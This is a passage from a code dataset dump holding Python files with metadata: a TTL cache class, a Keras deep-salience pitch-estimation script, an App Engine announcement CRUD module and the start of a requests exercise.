{"api_name": "numpy.cos", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 282, "usage_type": "call"}, {"api_name": "my_warnings.warnings.warn", "line_number": 292, "usage_type": "call"}, {"api_name": "my_warnings.warnings", "line_number": 292, "usage_type": "name"}, {"api_name": "numpy.tile", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 312, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 312, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 313, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.hypot", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.rad2deg", "line_number": 339, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 339, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 349, "usage_type": "attribute"}, {"api_name": "my_warnings.warnings.warn", "line_number": 391, "usage_type": "call"}, {"api_name": "my_warnings.warnings", "line_number": 391, "usage_type": "name"}]} +{"seq_id": "14425758428", "text": "import time\nfrom collections import OrderedDict\nfrom collections.abc import ItemsView, ValuesView\nfrom typing import Any, Callable, Generic, Iterator, Optional, Tuple, TypeVar\n\nimport attrs\n\n__all__ = (\"TTLItem\", \"TTLCache\", \"NullCache\")\n\nKT = TypeVar(\"KT\")\nVT = TypeVar(\"VT\")\n\n\nclass NullCache(dict):\n \"\"\"\n A special cache that will always return None\n\n Effectively just a lazy way to disable caching.\n \"\"\"\n\n def __setitem__(self, key, value) -> None:\n pass\n\n\n@attrs.define(eq=False, order=False, hash=False, kw_only=False)\nclass TTLItem(Generic[VT]):\n value: VT = attrs.field(\n repr=False,\n )\n expire: float = attrs.field(\n repr=False,\n )\n \"\"\"When the item expires in cache.\"\"\"\n\n def is_expired(self, timestamp: float) -> bool:\n \"\"\"\n Check if the item is expired.\n\n Args:\n timestamp: The current timestamp to compare against.\n\n Returns:\n True if the item is expired, False otherwise.\n\n \"\"\"\n 
return timestamp >= self.expire\n\n\nclass TTLCache(OrderedDict[KT, TTLItem[VT]]):\n def __init__(\n self,\n ttl: int = 600,\n soft_limit: int = 50,\n hard_limit: int = 250,\n on_expire: Optional[Callable] = None,\n ) -> None:\n super().__init__()\n\n self.ttl = ttl\n self.hard_limit = hard_limit\n self.soft_limit = min(soft_limit, hard_limit)\n self.on_expire = on_expire\n\n def __setitem__(self, key: KT, value: VT) -> None:\n expire = time.monotonic() + self.ttl\n item = TTLItem(value, expire)\n super().__setitem__(key, item)\n self.move_to_end(key)\n\n self.expire()\n\n def __getitem__(self, key: KT) -> VT:\n # Will not (should not) reset expiration!\n item = super().__getitem__(key)\n # self._reset_expiration(key, item)\n return item.value\n\n def pop(self, key: KT, default=attrs.NOTHING) -> VT:\n if key in self:\n item = self[key]\n del self[key]\n return item\n\n if default is attrs.NOTHING:\n raise KeyError(key)\n\n return default\n\n def get(self, key: KT, default: Optional[VT] = None, reset_expiration: bool = True) -> VT:\n item = super().get(key, default)\n if item is not default:\n if reset_expiration:\n self._reset_expiration(key, item)\n return item.value\n\n return default\n\n def values(self) -> ValuesView[VT]:\n return _CacheValuesView(self)\n\n def items(self) -> ItemsView:\n return _CacheItemsView(self)\n\n def _reset_expiration(self, key: KT, item: TTLItem) -> None:\n self.move_to_end(key)\n item.expire = time.monotonic() + self.ttl\n\n def _first_item(self) -> Tuple[KT, TTLItem[VT]]:\n return next(super().items().__iter__())\n\n def expire(self) -> None:\n \"\"\"Removes expired elements from the cache.\"\"\"\n if self.soft_limit and len(self) <= self.soft_limit:\n return\n\n if self.hard_limit:\n while len(self) > self.hard_limit:\n self._expire_first()\n\n timestamp = time.monotonic()\n while True:\n key, item = self._first_item()\n if item.is_expired(timestamp):\n self._expire_first()\n else:\n break\n\n def _expire_first(self) -> None:\n key, value = self.popitem(last=False)\n if self.on_expire:\n self.on_expire(key, value)\n\n\nclass _CacheValuesView(ValuesView):\n def __contains__(self, value) -> bool:\n for key in self._mapping:\n v = self._mapping.get(key, reset_expiration=False)\n if v is value or v == value:\n return True\n return False\n\n def __iter__(self) -> Iterator[Any]:\n for key in self._mapping:\n yield self._mapping.get(key, reset_expiration=False)\n\n def __reversed__(self) -> Iterator[Any]:\n for key in reversed(self._mapping):\n yield self._mapping.get(key, reset_expiration=False)\n\n\nclass _CacheItemsView(ItemsView):\n def __contains__(self, item) -> bool:\n key, value = item\n v = self._mapping.get(key, default=attrs.NOTHING, reset_expiration=False)\n return False if v is attrs.NOTHING else v is value or v == value\n\n def __iter__(self) -> Iterator[Tuple[Any, Any]]:\n for key in self._mapping:\n yield key, self._mapping.get(key, reset_expiration=False)\n\n def __reversed__(self) -> Iterator[Tuple[Any, Any]]:\n for key in reversed(self._mapping):\n yield key, self._mapping.get(key, reset_expiration=False)\n", "repo_name": "interactions-py/interactions.py", "sub_path": "interactions/client/utils/cache.py", "file_name": "cache.py", "file_ext": "py", "file_size_in_byte": 4643, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 760, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.TypeVar", "line_number": 10, "usage_type": "call"}, {"api_name": "typing.TypeVar", "line_number": 11, "usage_type": "call"}, 
{"api_name": "typing.Generic", "line_number": 26, "usage_type": "name"}, {"api_name": "attrs.field", "line_number": 27, "usage_type": "call"}, {"api_name": "attrs.field", "line_number": 30, "usage_type": "call"}, {"api_name": "attrs.define", "line_number": 25, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 55, "usage_type": "name"}, {"api_name": "time.monotonic", "line_number": 65, "usage_type": "call"}, {"api_name": "attrs.NOTHING", "line_number": 78, "usage_type": "attribute"}, {"api_name": "attrs.NOTHING", "line_number": 84, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 89, "usage_type": "name"}, {"api_name": "collections.abc.ValuesView", "line_number": 98, "usage_type": "name"}, {"api_name": "collections.abc.ItemsView", "line_number": 101, "usage_type": "name"}, {"api_name": "time.monotonic", "line_number": 106, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 108, "usage_type": "name"}, {"api_name": "time.monotonic", "line_number": 120, "usage_type": "call"}, {"api_name": "collections.abc.ValuesView", "line_number": 134, "usage_type": "name"}, {"api_name": "typing.Iterator", "line_number": 142, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 142, "usage_type": "name"}, {"api_name": "typing.Iterator", "line_number": 146, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 146, "usage_type": "name"}, {"api_name": "collections.abc.ItemsView", "line_number": 151, "usage_type": "name"}, {"api_name": "attrs.NOTHING", "line_number": 154, "usage_type": "attribute"}, {"api_name": "attrs.NOTHING", "line_number": 155, "usage_type": "attribute"}, {"api_name": "typing.Iterator", "line_number": 157, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 157, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 157, "usage_type": "name"}, {"api_name": "typing.Iterator", "line_number": 161, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 161, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 161, "usage_type": "name"}]} +{"seq_id": "30814408580", "text": "\"\"\"Script to predict deepsalience output from audio\"\"\"\nfrom __future__ import print_function\n\nimport argparse\nimport librosa\nimport numpy as np\nimport os\nimport scipy\nimport csv\n\nfrom keras.models import Model\nfrom keras.layers import Dense, Input, Reshape, Lambda\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.normalization import BatchNormalization\nfrom keras import backend as K\nfrom keras.models import load_model\n\nTASKS = ['bass', 'melody1', 'melody2', 'melody3', 'multif0', 'pitch', 'vocal']\nBINS_PER_OCTAVE = 60\nN_OCTAVES = 6\nHARMONICS = [0.5, 1, 2, 3, 4, 5]\nSR = 22050\nFMIN = 32.7\nHOP_LENGTH = 256\n\n\ndef compute_hcqt(audio_fpath):\n \"\"\"Compute the harmonic CQT from a given audio file\n\n Parameters\n ----------\n audio_fpath : str\n path to audio file\n\n Returns\n -------\n hcqt : np.ndarray\n Harmonic cqt\n time_grid : np.ndarray\n List of time stamps in seconds\n freq_grid : np.ndarray\n List of frequency values in Hz\n\n \"\"\"\n y, fs = librosa.load(audio_fpath, sr=SR)\n\n cqt_list = []\n shapes = []\n for h in HARMONICS:\n cqt = librosa.cqt(\n y, sr=fs, hop_length=HOP_LENGTH, fmin=FMIN*float(h),\n n_bins=BINS_PER_OCTAVE*N_OCTAVES,\n bins_per_octave=BINS_PER_OCTAVE\n )\n 
cqt_list.append(cqt)\n shapes.append(cqt.shape)\n\n shapes_equal = [s == shapes[0] for s in shapes]\n if not all(shapes_equal):\n min_time = np.min([s[1] for s in shapes])\n new_cqt_list = []\n for i in range(len(cqt_list)):\n new_cqt_list.append(cqt_list[i][:, :min_time])\n cqt_list = new_cqt_list\n\n log_hcqt = ((1.0/80.0) * librosa.core.amplitude_to_db(\n np.abs(np.array(cqt_list)), ref=np.max)) + 1.0\n\n freq_grid = librosa.cqt_frequencies(\n BINS_PER_OCTAVE*N_OCTAVES, FMIN, bins_per_octave=BINS_PER_OCTAVE\n )\n\n time_grid = librosa.core.frames_to_time(\n range(log_hcqt.shape[2]), sr=SR, hop_length=HOP_LENGTH\n )\n\n return log_hcqt, freq_grid, time_grid\n\n\ndef bkld(y_true, y_pred):\n \"\"\"KL Divergence where both y_true an y_pred are probabilities\n \"\"\"\n y_true = K.clip(y_true, K.epsilon(), 1.0 - K.epsilon())\n y_pred = K.clip(y_pred, K.epsilon(), 1.0 - K.epsilon())\n return K.mean(K.mean(\n -1.0*y_true* K.log(y_pred) - (1.0 - y_true) * K.log(1.0 - y_pred),\n axis=-1), axis=-1)\n\n\ndef model_def():\n \"\"\"Created compiled Keras model\n\n Returns\n -------\n model : Model\n Compiled keras model\n \"\"\"\n input_shape = (None, None, 6)\n inputs = Input(shape=input_shape)\n\n y0 = BatchNormalization()(inputs)\n y1 = Conv2D(128, (5, 5), padding='same', activation='relu', name='bendy1')(y0)\n y1a = BatchNormalization()(y1)\n y2 = Conv2D(64, (5, 5), padding='same', activation='relu', name='bendy2')(y1a)\n y2a = BatchNormalization()(y2)\n y3 = Conv2D(64, (3, 3), padding='same', activation='relu', name='smoothy1')(y2a)\n y3a = BatchNormalization()(y3)\n y4 = Conv2D(64, (3, 3), padding='same', activation='relu', name='smoothy2')(y3a)\n y4a = BatchNormalization()(y4)\n y5 = Conv2D(8, (70, 3), padding='same', activation='relu', name='distribute')(y4a)\n y5a = BatchNormalization()(y5)\n y6 = Conv2D(1, (1, 1), padding='same', activation='sigmoid', name='squishy')(y5a)\n predictions = Lambda(lambda x: K.squeeze(x, axis=3))(y6)\n\n model = Model(inputs=inputs, outputs=predictions)\n model.compile(loss=bkld, metrics=['mse'], optimizer='adam')\n return model\n\n\ndef load_model(task):\n \"\"\"Load a precompiled, pretrained model\n\n Parameters\n ----------\n task : str\n One of\n -'bass'\n -'melody1'\n -'melody2'\n -'melody3'\n -'multif0'\n -'pitch'\n -'vocal'\n\n Returns\n -------\n model : Model\n Pretrained, precompiled Keras model\n\n \"\"\"\n model = model_def()\n if task not in TASKS:\n raise ValueError(\"task must be one of {}\".format(TASKS))\n\n weights_path = os.path.join('weights', '{}.h5'.format(task))\n if not os.path.exists(weights_path):\n raise IOError(\n \"Cannot find weights path {} for this task.\".format(weights_path))\n\n model.load_weights(weights_path)\n return model\n\n\ndef get_single_test_prediction(model, input_hcqt):\n \"\"\"Generate output from a model given an input numpy file\n\n Parameters\n ----------\n model : Model\n Pretrained model\n input_hcqt : np.ndarray\n HCQT\n\n Returns\n -------\n predicted_output : np.ndarray\n Matrix of predictions\n\n \"\"\"\n input_hcqt = input_hcqt.transpose(1, 2, 0)[np.newaxis, :, :, :]\n\n n_t = input_hcqt.shape[2]\n n_slices = 2000\n t_slices = list(np.arange(0, n_t, n_slices))\n output_list = []\n for i, t in enumerate(t_slices):\n print(\" > {} / {}\".format(i + 1, len(t_slices)))\n prediction = model.predict(input_hcqt[:, :, t:t+n_slices, :])\n output_list.append(prediction[0, :, :])\n\n predicted_output = np.hstack(output_list)\n\n return predicted_output\n\n\ndef get_multif0(pitch_activation_mat, freq_grid, time_grid, 
thresh=0.3):\n \"\"\"Compute multif0 output containing all peaks in the output that\n fall above thresh\n\n Parameters\n ----------\n pitch_activation_mat : np.ndarray\n Deep salience prediction\n freq_grid : np.ndarray\n Frequency values\n time_grid : np.ndarray\n Time values\n thresh : float, default=0.3\n Likelihood threshold\n\n Returns\n -------\n times : np.ndarray\n Time values\n freqs : list\n List of lists of frequency values\n\n \"\"\"\n peak_thresh_mat = np.zeros(pitch_activation_mat.shape)\n peaks = scipy.signal.argrelmax(pitch_activation_mat, axis=0)\n peak_thresh_mat[peaks] = pitch_activation_mat[peaks]\n\n idx = np.where(peak_thresh_mat >= thresh)\n\n est_freqs = [[] for _ in range(len(time_grid))]\n for f, t in zip(idx[0], idx[1]):\n est_freqs[t].append(freq_grid[f])\n\n est_freqs = [np.array(lst) for lst in est_freqs]\n return time_grid, est_freqs\n\n\ndef get_singlef0(pitch_activation_mat, freq_grid, time_grid, thresh=0.3,\n use_neg=True):\n \"\"\"Compute single-f0 output containing the maximum likelihood per time frame.\n Frames with no likelihoods above the threshold are given negative values.\n\n Parameters\n ----------\n pitch_activation_mat : np.ndarray\n Deep salience prediction\n freq_grid : np.ndarray\n Frequency values\n time_grid : np.ndarray\n Time values\n thresh : float, default=0.3\n Likelihood threshold\n use_neg : bool\n If True, frames with no value above the threshold the frequency\n are given negative values of the frequency with the largest liklihood.\n If False, those frames are given the value 0.0\n\n Returns\n -------\n times : np.ndarray\n Time values\n freqs : np.ndarray\n Frequency values\n\n \"\"\"\n max_idx = np.argmax(pitch_activation_mat, axis=0)\n est_freqs = []\n for i, f in enumerate(max_idx):\n if pitch_activation_mat[f, i] < thresh:\n if use_neg:\n est_freqs.append(-1.0*freq_grid[f])\n else:\n est_freqs.append(0.0)\n else:\n est_freqs.append(freq_grid[f])\n est_freqs = np.array(est_freqs)\n return time_grid, est_freqs\n\n\ndef save_multif0_output(times, freqs, output_path):\n \"\"\"Save multif0 output to a csv file\n\n Parameters\n ----------\n times : np.ndarray\n array of time values\n freqs : list of lists\n list of lists of frequency values\n output_path : str\n path to save output\n\n \"\"\"\n with open(output_path, 'w') as fhandle:\n csv_writer = csv.writer(fhandle, delimiter='\\t')\n for t, f in zip(times, freqs):\n row = [t]\n row.extend(f)\n csv_writer.writerow(row)\n\n\ndef save_singlef0_output(times, freqs, output_path):\n \"\"\"Save singlef0 output to a csv file\n\n Parameters\n ----------\n times : np.ndarray\n array of time values\n freqs : np.ndarray\n array of frequency values\n output_path : str\n path to save output\n\n \"\"\"\n with open(output_path, 'w') as fhandle:\n csv_writer = csv.writer(fhandle, delimiter='\\t')\n for t, f in zip(times, freqs):\n csv_writer.writerow([t, f])\n\n\ndef compute_output(hcqt, time_grid, freq_grid, task, output_format, threshold,\n use_neg, save_dir, save_name):\n \"\"\"Comput output for a given task\n\n Parameters\n ----------\n hcqt : np.ndarray\n harmonic cqt\n time_grid : np.ndarray\n array of times\n freq_grid : np.ndarray\n array of frequencies\n task : str\n which task to compute\n output_format : str\n specify whehter to save output as singlef0, multif0 or salience\n threshold : float\n amplitude threshold for multif0 and singlef0 output\n use_neg : bool\n whether to report negative frequency values in singlef0 output\n save_dir : str\n Path to folder to save output\n save_name 
: str\n Output file basename\n\n \"\"\"\n model = load_model(task)\n\n print(\"Computing salience...\")\n pitch_activation_mat = get_single_test_prediction(model, hcqt)\n\n print(\"Saving output...\")\n if output_format == 'singlef0':\n times, freqs = get_singlef0(\n pitch_activation_mat, freq_grid, time_grid, thresh=threshold,\n use_neg=use_neg\n )\n save_path = os.path.join(\n save_dir, \"{}_{}_singlef0.csv\".format(save_name, task))\n save_singlef0_output(times, freqs, save_path)\n elif output_format == 'multif0':\n times, freqs = get_multif0(\n pitch_activation_mat, freq_grid, time_grid, thresh=threshold)\n save_path = os.path.join(\n save_dir, \"{}_{}_multif0.csv\".format(save_name, task))\n save_multif0_output(times, freqs, save_path)\n else:\n save_path = os.path.join(\n save_dir, \"{}_{}_salience.npz\".format(save_name, task))\n np.savez(save_path, salience=pitch_activation_mat, times=time_grid,\n freqs=freq_grid)\n\n print(\"Done!\")\n\n\ndef load_model_melody1():\n \"\"\"Load the melody1 model and return it (used by Replicate)\n\n Returns\n -------\n model : Model\n The pretrained melody1 model\n \"\"\"\n return load_model(\"melody1\")\n\n\ndef infer_example_melody1(model, audio_path):\n \"\"\"Run a single inference of the melody1 model on an audio file\n\n Parameters\n ----------\n model : Model\n The pretrained melody1 model\n audio_path : str\n Path to audio file to extract melody from\n\n Returns\n -------\n (times, freqs) : Tuple[np.ndarray, np.ndarray]\n Time grid and predicted frequencies\n \"\"\"\n hcqt, freq_grid, time_grid = compute_hcqt(audio_path)\n pitch_activation_mat = get_single_test_prediction(model, hcqt)\n times, freqs = get_singlef0(\n pitch_activation_mat, freq_grid, time_grid, thresh=0.3,\n use_neg=True\n )\n return times, freqs\n\n\ndef main(args):\n if args.task not in ['all'] + TASKS:\n raise ValueError(\"task must be 'all' or one of {}\".format(TASKS))\n\n save_name = os.path.basename(args.audio_fpath).split('.')[0]\n\n # this is slow for long audio files\n print(\"Computing HCQT...\")\n hcqt, freq_grid, time_grid = compute_hcqt(args.audio_fpath)\n\n\n if args.task == 'all':\n for task in TASKS:\n print(\"[Computing {} output]\".format(task))\n compute_output(\n hcqt, time_grid, freq_grid, task, args.output_format,\n args.threshold, args.use_neg, args.save_dir, save_name)\n else:\n compute_output(\n hcqt, time_grid, freq_grid, args.task, args.output_format,\n args.threshold, args.use_neg, args.save_dir, save_name)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Predict deep salience output for a given task\")\n parser.add_argument(\"audio_fpath\",\n type=str,\n help=\"Path to input audio file.\")\n parser.add_argument(\"task\",\n type=str,\n help=\"Task to compute one of \"\n \"all, bass, melody1, melody2, melody3, \"\n \"multif0, pitch, vocal.\")\n parser.add_argument(\"save_dir\",\n type=str,\n help=\"Path to folder for saving output\")\n parser.add_argument(\"-f\", \"--output_format\",\n type=str,\n choices=['singlef0', 'multif0', 'salience'],\n default='salience',\n help=\"Which format to save output. \"\n \"singlef0 saves a csv of single f0 values. \"\n \"mulif0 saves a csv of multif0 values. \"\n \"salience (default) saves a npz file of the \"\n \"salience matrix.\")\n parser.add_argument(\"-t\", \"--threshold\",\n type=float,\n default=0.3,\n help=\"Amplitude threshold. 
Only used when \"\n \"output_format is singlef0 or multif0\")\n parser.add_argument(\"-n\", \"--use_neg\",\n type=bool,\n default=True,\n help=\"If True, report unvoiced frames with negative values. \"\n \"This is only used when output_format is singlef0.\")\n\n main(parser.parse_args())\n", "repo_name": "rabitt/ismir2017-deepsalience", "sub_path": "predict/predict_on_audio.py", "file_name": "predict_on_audio.py", "file_ext": "py", "file_size_in_byte": 13601, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 75, "dataset": "github-code", "pt": "53", "api": [{"api_name": "librosa.load", "line_number": 45, "usage_type": "call"}, {"api_name": "librosa.cqt", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 60, "usage_type": "call"}, {"api_name": "librosa.core.amplitude_to_db", "line_number": 66, "usage_type": "call"}, {"api_name": "librosa.core", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 67, "usage_type": "attribute"}, {"api_name": "librosa.cqt_frequencies", "line_number": 69, "usage_type": "call"}, {"api_name": "librosa.core.frames_to_time", "line_number": 73, "usage_type": "call"}, {"api_name": "librosa.core", "line_number": 73, "usage_type": "attribute"}, {"api_name": "keras.backend.clip", "line_number": 83, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 83, "usage_type": "name"}, {"api_name": "keras.backend.epsilon", "line_number": 83, "usage_type": "call"}, {"api_name": "keras.backend.clip", "line_number": 84, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 84, "usage_type": "name"}, {"api_name": "keras.backend.epsilon", "line_number": 84, "usage_type": "call"}, {"api_name": "keras.backend.mean", "line_number": 85, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 85, "usage_type": "name"}, {"api_name": "keras.backend.log", "line_number": 86, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 86, "usage_type": "name"}, {"api_name": "keras.layers.Input", "line_number": 99, "usage_type": "call"}, {"api_name": "keras.layers.normalization.BatchNormalization", "line_number": 101, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv2D", "line_number": 102, "usage_type": "call"}, {"api_name": "keras.layers.normalization.BatchNormalization", "line_number": 103, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv2D", "line_number": 104, "usage_type": "call"}, {"api_name": "keras.layers.normalization.BatchNormalization", "line_number": 105, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv2D", "line_number": 106, "usage_type": "call"}, {"api_name": "keras.layers.normalization.BatchNormalization", "line_number": 107, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv2D", "line_number": 108, "usage_type": "call"}, {"api_name": "keras.layers.normalization.BatchNormalization", "line_number": 109, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv2D", "line_number": 110, "usage_type": "call"}, {"api_name": "keras.layers.normalization.BatchNormalization", "line_number": 111, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv2D", "line_number": 112, "usage_type": "call"}, {"api_name": "keras.layers.Lambda", "line_number": 113, "usage_type": "call"}, {"api_name": "keras.backend.squeeze", 
"line_number": 113, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 113, "usage_type": "name"}, {"api_name": "keras.models.Model", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path", "line_number": 145, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.newaxis", "line_number": 170, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 209, "usage_type": "call"}, {"api_name": "scipy.signal.argrelmax", "line_number": 210, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 210, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 261, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 279, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 300, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 331, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 342, "usage_type": "call"}, {"api_name": "os.path", "line_number": 342, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 348, "usage_type": "call"}, {"api_name": "os.path", "line_number": 348, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 352, "usage_type": "call"}, {"api_name": "os.path", "line_number": 352, "usage_type": "attribute"}, {"api_name": "numpy.savez", "line_number": 354, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 368, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 399, "usage_type": "call"}, {"api_name": "os.path", "line_number": 399, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 419, "usage_type": "call"}]} +{"seq_id": "9189867217", "text": "import status_code\nfrom datetime import datetime, timedelta\nfrom google.appengine.ext import db\nimport json\n\nclass Announcement(db.Model):\n Date = db.DateTimeProperty(required=True)\n UDate = db.DateTimeProperty(required=True)\n Title = db.StringProperty(required=True)\n Content = db.TextProperty(required=True)\n \nclass AnnouncementOperation(object):\n @staticmethod\n def CreateAnnouncement(title, content):\n date = datetime.now() + timedelta(hours=8)\n \n announcement = Announcement(key_name = date.strftime(\"%Y-%m-%d %H:%M:%S\"), Title = title, Content = content, Date = date, UDate = date)\n announcement.put()\n \n return status_code.CREATE_ANNOUNCEMENT_SUCCESS\n \n @staticmethod\n def GetAnnouncementList():\n announcements = db.GqlQuery(\"SELECT * FROM Announcement ORDER BY UDate DESC\")\n result = []\n for announcement in announcements:\n result.append({\n 'title': announcement.Title,\n 'content': announcement.Content,\n 'udate': announcement.UDate.strftime(\"%Y-%m-%d %H:%M:%S\"),\n 'date': announcement.Date.strftime(\"%Y-%m-%d %H:%M:%S\"),\n })\n \n return json.dumps(result)\n \n @staticmethod\n def GetAnnouncement(date):\n announcement_key = db.Key.from_path('Announcement', date)\n announcement = db.get(announcement_key)\n 
if announcement is not None:\n result = [ announcement.Title, announcement.Content ]\n return json.dumps(result)\n return status_code.CANNOT_FIND_ITEM\n \n @staticmethod\n def SetAnnouncement(title, content, date):\n announcement_key = db.Key.from_path('Announcement', date)\n announcement = db.get(announcement_key)\n if announcement is not None:\n announcement.Title = title\n announcement.Content = content\n announcement.UDate = datetime.now() + timedelta(hours=8)\n announcement.put()\n return status_code.UPDATE_SUCCESS\n return status_code.CANNOT_FIND_ITEM\n \n @staticmethod\n def DelAnnouncement(date):\n announcement_key = db.Key.from_path('Announcement', date)\n announcement = db.get(announcement_key)\n announcement.delete()\n return status_code.DELETE_SUCCESS\n ", "repo_name": "rockers7414/MKTZCrew", "sub_path": "announcement.py", "file_name": "announcement.py", "file_ext": "py", "file_size_in_byte": 2394, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "google.appengine.ext.db.Model", "line_number": 6, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 6, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.DateTimeProperty", "line_number": 7, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 7, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.DateTimeProperty", "line_number": 8, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 8, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.StringProperty", "line_number": 9, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 9, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.TextProperty", "line_number": 10, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 10, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 15, "usage_type": "call"}, {"api_name": "status_code.CREATE_ANNOUNCEMENT_SUCCESS", "line_number": 20, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db.GqlQuery", "line_number": 24, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 24, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 34, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 38, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 38, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 38, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.get", "line_number": 39, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 39, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "status_code.CANNOT_FIND_ITEM", "line_number": 43, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 47, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 47, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 47, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.get", "line_number": 48, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 48, "usage_type": "name"}, {"api_name": 
"datetime.datetime.now", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 52, "usage_type": "call"}, {"api_name": "status_code.UPDATE_SUCCESS", "line_number": 54, "usage_type": "attribute"}, {"api_name": "status_code.CANNOT_FIND_ITEM", "line_number": 55, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 59, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 59, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 59, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.get", "line_number": 60, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 60, "usage_type": "name"}, {"api_name": "status_code.DELETE_SUCCESS", "line_number": 62, "usage_type": "attribute"}]} +{"seq_id": "1652503246", "text": "from random import randint\n\nimport requests\n\n\"\"\"\nExercise 1\nMake virtualenv catalog. Enter it, and activate.\nInstall 'requests' library, and write simple program, that will take html from any website.\n\"\"\"\n\n\n# Creating new virtualenv - virtualenv -p python3 env\n\n# Instaling requests library in env - pip install requests\n\n\ndef get_html(url):\n r = 